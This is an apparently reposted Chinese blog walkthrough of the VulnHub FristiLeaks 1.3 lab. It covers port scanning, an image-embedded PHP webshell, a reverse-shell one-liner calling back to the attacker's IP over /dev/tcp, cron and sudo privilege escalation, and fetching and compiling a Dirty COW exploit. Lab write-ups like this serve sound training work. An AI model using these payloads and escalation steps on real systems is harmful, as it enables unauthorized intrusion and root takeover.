*VulnHub-FristiLeaks:1.3暴力解法、细节解法,主打软硬都吃,隧道搭建、寻找exp、提权、只要你想没有做不到的姿势

*VulnHub-FristiLeaks:1.3暴力解法、细节解法,主打软硬都吃,隧道搭建、寻找exp、提权、只要你想没有做不到的姿势

一、信息收集

1、扫靶机ip

经典第一步,扫一下靶机ip

arp-scan -l
扫描同网段
nmap -sP 192.168.122.0/24

2、指纹扫描、端口
nmap -sV -O -p 1-65535 192.168.122.128
nmap -sS -sV 192.168.122.128
nmap -p- -sV -A 192.168.122.128
whatweb -v 192.168.122.128

只扫出了一个端口,估计要跟网页打交道了,这里有个php5.3.3留意一下,可能有说法

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
3、访问80端口

一个登录页面,尝试尝试sql和弱口令,因该是登录不了

这个页面的源代码有这样看着像加密的数据,我们去尝试尝试解码一下

base64解密一下看着像一张图片,解码是乱码,我们用kali去转化一下

base64 -d base64.txt > base64.png

这里原来是密码,账户名是作者名字

因该是文件上传了,可以做一个后门文件丢进去然后拿蚁剑、冰蝎连一下。

这里介绍一下如何制作图片木马

1、cmd命令将php的内容添加到png中生成新的png

copy /b 1.jpg + 1.php muma.png
这里1.jpg是源图片,1.php是木马文件,最后muma.png就是我们生成的图片马

然后这里蚁剑也是能连上的,可以在蚁剑上弹shell

这里蚁剑开终端还是挺舒服的

这里貌似是一个漏洞,先查看一下内核版本吧

这里是找到了一些提示,说实话这个因该是翻译问题,看的我很眩晕,大概意思说把runthis文件丢进tmp里,然后runthis里的命令每一分钟都会以他的账户运行

我们输入echo “/home/admin/chmod 777 /home/admin” > /tmp/runthis就能访问admin了

4、建立隧道,蚁剑、冰蝎、nc(瑞士军刀)

首先我们在kali终端建立一个nc监听

这里丢了一个phpinfo.php.gif是可以访问的,想说一点就是有时候连接可能会失败,总有一些莫名原因,这时候我们能做的就是不断尝试,不断试错。还有耐心,patience is the key in life。

我们也拿到了一个apache的权限

<?php system("bash -c 'sh -i &>/dev/tcp/192.168.66.129/6666 0>&1'");?>
这段代码就是我们放入a.php.png里面的语句,是一个反连语句,就是让靶机的bash创建一个shell给我们,给到我们的攻击机
5、提权

2025.3.6 AM: 10:49

方法一:python脚本

这里总结一下第二个方法,个人觉得这个方法应该是顺着作者方法进行的,因为靶机会提示你并给你引导至python脚本那一块,但是两种方式都可以,毕竟内核版本太老了 这里我们还是用kali来提权,蚁剑还是不太方便,用蚁剑vim时候不回显,不知道是不是shell不完整的问题。

两个解码出来LetThereBeFristi!和thisisalsopw123,根据之前看到的脚本whoisyourgodnow,大概能确定sudo账户是fristigod尝试登录 这里提到的权限是fristigod

这张图片在别的师傅哪儿是提示出来的,但是我这儿没有,可能是我已经提权到了还是怎么着,他告诉我们有一个root权限的文件夹,路径也给我们了,直接塞一个提权命令就可以了。这个root是任何命令都以root权限执行 旁边有个日志文件,但是可能是我这个靶机不完整,应该是有一个flag的,但是我只需要提权就完成了

sudo -u fristi ./doCom /bin/bash -p
用fristi用户执行doCom文件,然后让bash开一个新的shell,这样我们就能完成提权了,不过为什么不是root用户,是因为我使用过脏牛提权了,留下了一个管理员账户,但是id=0就已经是管理员组了

这里就是系统管理员了,就是利用这个root用户运行的doCom就能提权了

这里也是给大家找了个小彩蛋,虽然我是打靶机的,但是这道题原本应该是ctf题,挺变态的,出这种难度,说实话,这作者还挺自恋的哈。

这个作者让我花了一天时间,我觉得把flag改成下面的会更好

2025.3.6 AM: 11:28

方法二:脏牛提权,寻找exp.
uname -a
我们查看一下内核信息

靶机版本信息:Linux 2.6.32-573.8.1.el6.x86_64 这里看版本信息因该是可以使用

影响范围:Linux内核版本2.6.22(2007年发布)至修复前版本(2016年10月修复),包括CentOS、Ubuntu、Android等系统searchsploit linux 2.6.32 Privilege
寻找linux的exp或者去github下一个脏牛exp

这个还有教程,尝试一下这个exp。

1、首先开python或者apache2
python -m http.server 80
service apache2 start2、靶机下载脏牛的c语言脚本
wget http://192.168.66.129/dirty.c3、用gcc编译脏牛(dirty.c)名为exp
gcc -pthread dirty.c -o exp -lcrypt4、修复shell,因为这里shell是不完整的,大概运行到第5步会提示你
python -c 'import pty;pty.spawn("/bin/bash")'5、运行,这里是自己设置密码,账户就是exp作者给你的
./exp 1234566、提权
su firefart
123456
然后敲回车

最后用这个账户就能登陆了,密码就是你自己设置的

这里kali出毛病了疯狂报错,整个上午全在调试最后也是尝试出来了,很多雷区,师傅们打这个靶机时候小心一点。

到这里人已经眩晕了,我本想着今天打两台靶机的,但是先在是18:30了,吃饭去了。肝不动了。如果有师傅遇到问题问就可以了,虽然我这瓜不保甜,但我尽力

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/72927.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

PHP:格式化JSON为PHP语法格式

1. 原生函数 $arr [1,2,3,4]; $str var_export($a,true); var_dump($str); 2. 自定义方法 class Export{private static $space;private static function do($a, string $prev){$res ;$next $prev . self::$space;if (is_array($a)) {$res . [;foreach ($a as $k > $…

【Python 数据结构 9.树】

我装作漠视一切&#xff0c;其实我在乎的太多&#xff0c;但我知道抓得越紧越容易失去 —— 25.3.6 一、树的基本概念 1.树的定义 树是n个结点的有限集合&#xff0c;n0时为空树。当n大于0的时候&#xff0c;满足如下两个条件&#xff1a; ① 有且仅有一个特定的结点&#xff…

pyqt联合designer的运用和设置

PyQt Designer 简介 PyQt Designer 是一个用于创建和设计 PyQt 应用程序用户界面的可视化工具。它允许用户通过拖放方式添加和排列各种控件,如按钮、文本框、滑块等,并设置它们的属性和样式,从而快速构建出美观且功能完整的 UI 界面。 Windows版本:【免费】安装包别管啊啊…

纯html文件实现目录和文档关联

目录结构 效果图 代码 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8"><title>项目结题报告</title><style lang"scss">::-webkit-scrollbar {width: 6px;height: 6px;}::-webkit-scro…

python用户图形界面wxpython库安装与使用

要开始使用 wxPython 库来创建 Python 用户图形界面&#xff0c;首先需要安装这个库。在大多数情况下&#xff0c;你可以通过 pip 来安装 wxPython。下面我会指导你完成安装过程&#xff0c;并给出一个简单的例子来展示如何使用 wxPython 创建一个基本的窗口应用程序。 安装 w…

MongoDB winx64 msi包安装详细教程

首先我们可以从官网上选择对应版本和对应的包类型进行安装&#xff1a; 下载地址&#xff1a;Download MongoDB Community Server | MongoDB 这里可以根据自己的需求&#xff0c; 这里我选择的是8.0.5 msi的版本&#xff0c;采用的传统装软件的方式安装。无需配置命令。 下载…

如何借助 ArcGIS Pro 高效统计基站 10km 范围内的村庄数量?

在当今数字化时代&#xff0c;地理信息系统&#xff08;GIS&#xff09;技术在各个领域都发挥着重要作用。 特别是在通信行业&#xff0c;对于基站周边覆盖范围内的地理信息分析&#xff0c;能够帮助我们更好地进行网络规划、资源分配以及市场分析等工作。 今天&#xff0c;就…

saltstack通过master下发脚本批量修改minion_id,修改为IP

通过master下发脚本批量修改minion_id&#xff0c;以修改为IP为例 通过cmd.script远程执行shell脚本修改minion_id&#xff0c;步骤如下: # 下发脚本并执行 >> salt old_minion_id cmd.script salt://modify_minion_id.sh saltenvdev #输出结果 old_minion_id:Minion di…

【大模型】WPS 接入 DeepSeek-R1详解,打造全能AI办公助手

目录 一、前言 二、WPS接入AI工具优势​​​​​​​ 三、WPS接入AI工具两种方式 3.1 手动配置的方式 3.2 Office AI助手 四、WPS手动配置方式接入AI大模型 4.1 安装VBA插件 4.1.1 下载VBA插件并安装 4.2 配置WPS 4.3 WPS集成VB 4.4 AI助手效果测试 4.5 配置模板文…

《苍穹外卖》SpringBoot后端开发项目重点知识整理(DAY1 to DAY3)

目录 一、在本地部署并启动Nginx服务1. 解压Nginx压缩包2. 启动Nginx服务3. 验证Nginx是否启动成功&#xff1a; 二、导入接口文档1. 黑马程序员提供的YApi平台2. YApi Pro平台3. 推荐工具&#xff1a;Apifox 三、Swagger1. 常用注解1.1 Api与ApiModel1.2 ApiModelProperty与Ap…

Mysql5.7-yum安装和更改mysql数据存放路径-2020年记录

记录下官网里用yum rpm源安装mysql, 1 官网下载rpm https://dev.mysql.com/downloads/repo/yum/ https://dev.mysql.com/doc/refman/5.7/en/linux-installation-yum-repo.html&#xff08;附官网操作手册&#xff09; wget https://repo.mysql.com//mysql80-community-release…

HTML5(Web前端开发笔记第一期)

p.s.这是萌新自己自学总结的笔记&#xff0c;如果想学习得更透彻的话还是请去看大佬的讲解 目录 三件套标签标题标签段落标签文本格式化标签图像标签超链接标签锚点链接默认链接地址 音频标签视频标签 HTML基本骨架综合案例->个人简介列表表格表单input标签单选框radio上传…

Oracle19c进入EM Express(Oracle企业管理器)详细步骤

以下是使用Oracle 19c进入Oracle Enterprise Manager Database Express&#xff08;EM Express&#xff09;的详细步骤&#xff1a; ### **步骤 1&#xff1a;确认EM Express配置状态** 1. **登录数据库服务器** 使用Oracle用户或管理员权限账户登录操作系统。 2. **查看EM…

JSAR 基础 1.2.1 基础概念_空间小程序

JSAR 基础 1.2.1 基础概念_空间小程序 空间空间自由度可嵌入空间空间小程序 最新的技术进展表明&#xff0c;官网之前的文档准备废除了&#xff0c;基于xsml的开发将退出历史舞台&#xff0c;three.js和普通web结合的技术将成为主导。所以后续学习请移步three.js学习路径&#…

JavaWeb-servlet6中重定向、转发、cookie、session、文件上传和下载

请求重定向 一个 web 资源收到客户端请求后&#xff0c;通知客户端去访问另外一个 web 资源&#xff0c;这称之为请求重定向。 使用response对象提供的sendRedirect()方法&#xff0c;可以将网页重定向到另一个页面。SendRedirect()方法的语法格式&#xff1a; response.send…

信息安全访问控制、抗攻击技术、安全体系和评估(高软42)

系列文章目录 信息安全访问控制、抗攻击技术、安全体系和评估 文章目录 系列文章目录前言一、信息安全技术1.访问控制2.抗攻击技术 二、欺骗技术1.ARP欺骗2.DNS欺骗3.IP欺骗 三、抗攻击技术1.端口扫描2.强化TCP/IP堆栈 四、保证体系和评估1.保证体系2.安全风险管理 五、真题在…

SpringBoot POST和GET请求

1. 什么是 HTTP 请求&#xff1f; HTTP 协议&#xff1a;超文本传输协议&#xff0c;用于客户端和服务器之间的通信。 常见 HTTP 方法&#xff1a; GET&#xff1a;获取资源POST&#xff1a;提交数据PUT&#xff1a;更新资源DELETE&#xff1a;删除资源 2. GET 请求详解 作…

mysql的Innodb最大支持的索引长度是多少,以及索引长度怎么计算

今天正好有空&#xff0c;来讲个之前粉丝经常问的一个知识&#xff0c;就是mysql的Innodb最大支持的索引长度是多少&#xff1f;以及索引长度怎么计算&#xff1f; 一、mysql的innodb引擎&#xff0c;创建索引最大支持的长度是多少字节&#xff1f; 不墨迹&#xff0c;直接说…

Python 中 `sort()` 和 `sorted()` 的用法与区别

Python 中 sort() 和 sorted() 的用法与区别 1. sort() 方法&#xff1a; sort() 是 Python 列表类型 (list) 的一个方法&#xff0c;它用于就地&#xff08;原地&#xff09;排序列表&#xff0c;修改原始列表。排序时可以通过 key 参数指定排序依据&#xff0c;还可以通过 …

SpringBoot过滤器(Filter)的使用:Filter接口、FilterRegistrationBean类配置、@WebFilter注释

1、过滤器(Filter)的介绍 Spring Boot 的过滤器用于对数据进行过滤处理。通过 Spring Boot 的过滤器,程序开发人员不仅可以对用户通过 URL 地址发送的请求进行过滤处理(例如:过滤一些错误的请求或者请求中的敏感词等),而且可以对服务器返回的数据进行过滤处理(例如:压…